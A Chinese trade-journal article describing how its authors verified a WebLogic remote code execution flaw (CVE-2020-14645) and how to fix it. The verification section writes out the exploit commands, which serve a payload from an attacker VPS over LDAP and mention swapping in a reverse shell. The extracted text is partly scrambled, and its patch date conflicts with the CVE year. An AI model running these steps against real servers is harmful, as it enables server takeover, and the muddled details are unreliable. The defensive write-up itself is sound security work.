1 引言
网络安全漏洞一直以来都是互联网行业面临的最大威胁。随着数字化的推进,在疫情和利益的推动下,对网络威胁应对迟缓的航运物流业正成为网络犯罪组织的优先攻击目标。2020年9月28日,全球第四大集装箱运输和海运公司——法国达飞(CMA CGM SA)信息系统遭到软件的攻击,导致达飞在中国上海、深圳和广州等地办事处的服务被中断。为防止恶意软件的攻击,达飞被迫关闭网络,采用手工操作和航运订舱平台INTTRA 来处理订单。
Weblogic远程代码执行漏洞属于高危风险网络安全漏洞。该漏洞允许未经身份验证的攻击者通过T3网络协议访问并破坏易受攻击的WebLogic Server,成功的漏洞利用可导致WebLogic Server被攻击者接管,造成远程代码执行,进而控制服务器。由于漏洞利用复杂度低、风险高,建议尽快修复。
2 事件经过
笔者一直从事网站的网络安全漏
洞扫描工作,于2020年10月发现一
起比较典型的Weblogic远程代码执行
漏洞,供读者参考。漏洞详细情况如
下:漏洞名称为Weblogic远程代码springframework远程代码执行漏洞
执行漏洞,漏洞数量1个,漏洞等级
为高危,存在漏洞的网站IP地址为
“172.---.70:7001/console/login/
LoginForm.jsp”(“---”代表网站部分
IP地址)。
3 验证过程
首先,通过Web安全漏洞扫描
工具,发现网站“172.---.70:
7001/console/login/LoginForm.jsp”
存在Weblogic远程代码执行漏洞。在
验证漏洞前,需下载两个工具JNDI-
Injection-Exploit-1.0-SNAPSHOT-all.
jar和CVE-2020-14645.jar。
网站测试验证需要使用VPS
(Virtual Private Server,虚拟专用服
务器)提供的LDAP服务(Lightweight
Directory Access Protocol,轻量目录访
问协议)与HTTP(Hyper Text Transfer
Protocol,超文本传输协议)服务。
LDAP服务运行在TCP/IP或者其他面
向连接的传输服务之上,需要HTTP
服务来支撑。所以在利用LDAP服
务验证漏洞前,需要先开启HTTP服
务,而JNDI-Injection-Exploit-1.0-
SNAPSHOT-all.jar工具是对LDAP
服务和HTTP服务的整合。JNDI-
Injection-Exploit-1.0-SNAPSHOT-all.
jar工具启动后会开启三个服务,即
RMI服务、LDAP服务以及HTTP服
务,并且自动编译成带命令行参数的
Java Class文件,然后生成JNDI链接
对Jackson、Fastjson、Weblogic反序
列化漏洞进行验证。在使用该工具时
需要先将该工具上传到VPS上再提供
服务,工具下载地址为“github.
com/welk1n/JNDI-Injection-Exploit”。
CVE-2020-14645.jar工具是验证
漏洞时执行的POC验证程序,需要在
攻击机上运行,工具下载地址为“
基于“Weblogic远程代码执行漏洞”
谈网络安全问题防范
周正 河北广电无线传媒股份有限公司
孙海波 国家广播电视总局广播电视科学研究院
摘要: 网络安全关系着国家安全、社会稳定、民族文化继承和发扬,其重要性不言而喻。本文就工作中发现的一起“Weblogic远程代码执行漏洞”,从事件经过、验证过程、修复建议几个方面进行介绍,使读者能够对该漏洞有一个比较清晰的认识,防止攻击者利用该漏洞对网站服务器进行远程代码执行,控制网站,导致挂马、恶意破坏网站、数据泄露等安全事件的发生。
关键词:网络安全漏洞 Weblogic 远程代码执行 VPS
56《广播电视网络》 2021年第4期 总第376期
57
《广播电视网络》 2021年第4期 总第376期
github/DSO-Lab/Weblogic_CVE-2020-14645”。接下来,笔者将详细介绍验证过程。
(1)查看该漏洞所在网站页面。输入网址“172.---.70:7001/console/login/LoginForm.jsp”。
(2)在VPS 上分别启动LDAP 服务和HTTP 服务。执行命令“java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C calc -A 175.---.240”。
如图1所示,-C 指要执行的命令,calc 是弹出计算器命令(此处也可以执行其它命令,如反弹shell 命令只需在对应的VPS 上对反弹shell 的端口进行监听即可),-A 指执行该命令的VPS 终端IP 地址(如本机IP 为175.---.240)。
执行命令后,会出现“JDK、JDK1.8、JDK1.7”三条JNDI Links,因为我们需要使用LDAP 服务,所以
选用LDAP 链接,也就是说JDK1.8对应的LDAP 链接“ldap://175.---.240: 1389/69czya”和JDK1.7对应的LDAP 链接“ldap://175.---.240:1389/k11psy”。
因为我们并不知道目标网站的JDK 版本是1.8还是1.7,所以需要分别进行验证。我们首先用JDK1.8进行验证,即使用JDK1.8对应的LDAP 链接“ldap://175.---.240:1389/69czya”进行测试。
(3)执行验证命令。在攻击机中输入命令“java -jar CVE-2020-14645.jar”和目标链接“LDAP_IP:LDAP_PORT/#Exploit”。
如图2所示,CVE-2020-14645.jar 为验证漏洞的POC 验证程序,在准备阶段提前将其下载到攻击机上;LDAP_IP:LDAP_PORT/#Exploit 指在VPS 上JDK1.8生成的LDAP 地址,即“LDAP://175.---.240:1389/69czya”,目标链接“172.---.70:7001/console/
login/LoginForm.jsp”。
(4)验证命令执行后,CVE-2020-14645.jar 工具会和VPS 提供的LDAP、HTTP 服务进行通信。由于VPS 执行了calc 命令(弹出计算器),如果目标网站存在Weblogic 远程代码执行漏洞,且为JDK1.8版本,则会弹出计算器,因此确认该网站存在Weblogic 远程代码执行漏洞。
(5)至此验证结束,但我
们也可以多做一步,用第2步中提到的JDK1.7对应的LDAP 链接“ldap://175.---.240:1389/k11psy”再次验证。按照第3步的命令进行操作,将“175.---.240:1389/69czya”替换为“175.---.240:1389/k11psy”,此时没有弹出计算器,但这并不意味着目标网站不存在Weblogic 远程代码执行漏洞,而是说明目标网站JDK 版本并不是1.7。
从上面的验证过程中,我们可以看到网站( IP 地址为172.----.70:7001/console/login/LoginForm.jsp)存在Weblogic 远程代码执行漏洞,目标网站上弹出了计算器工
具。利用该漏洞,恶意攻击者可能在网站上弹出其它界面、挂马或者执行其它恶意代码,进而控制服务器,后果将不堪设想。
4 修复建议
(1)安装官方补丁
Oracle 已于2018年10月发布补丁程序修复了该漏洞,用户只需参考官方通告及时下载受影响产品更新补丁即可,下载完成后参照补丁安装包中的readme 文件进行安装更新,以确保防护长期有效。下载Oracle 发布最新补丁,
用户需要持有正版软件的许可账号,登陆“acle”。
(2)限制T3访问来源
如图3所示,漏洞产生于Weblogic
图1 在VPS 上启动LDAP 和HTTP 服务
图2 在攻击机上执行验证命令
58
《广播电视网络》 2021年第4期 总第376期
图3 限制T3访问来源截图
默认启用的T3协议,因此可通过限制T3访问源来阻止攻击。
第一步,进入Weblogic 控制台,在“base_domain”的设置页面中,进入“安全”选项卡页面,点击“筛选器”,进入连接筛选器配置。
第二步,在连接筛选器中输入“Weblogic.security.Connection FilterImpl ”,参考图4中的写法,在连接筛选器规则中配置符合网站实际情况的规则。
第三步,保存设置后若规则未生效,建议重新启动Weblogic 服务器。重启Weblogic 服务器会导致业务中断,建议相关人员评估风险后,再进行操作。
(3)禁用IIOP 协议
如图5所示,通过关闭IIOP 协议对此漏洞进行缓解。
首先,在Weblogic 控制台中,选择“服务”→“AdminServer”→“协议”,取消“启用 IIOP”的勾选。
其次,保存设置后若规则未生效,建议重新启动Weblogic 服务器。重启
Weblogic 服务器会导致业务中断,建议相关人员评估风险后,再进行操作。
5 结束语
网络安全关系着国家主权安全、社会稳定、民族文化继承和发扬,其重要性不言而喻。为了确保网站的安全,除了要提升我们的专业技术水平外,还必须提高工作责任心,定期对网站进行漏洞扫描,发现问题及时处理,防患于未然。针对此次发现的Weblogic 远程代码执行漏洞,可以直
接执行远程代码,在目标网站上弹出计算器。如果该漏洞被恶意攻击者利用,
可能导致目标服务器被完全控制,
必须予以高度重视。RTN
图4 连接筛选器配置的规则
图5 禁用IIOP 协议截图
版权声明:本站内容均来自互联网,仅供演示用,请勿用于商业和其他非法用途。如果侵犯了您的权益请与我们联系QQ:729038198,我们将在24小时内删除。
发表评论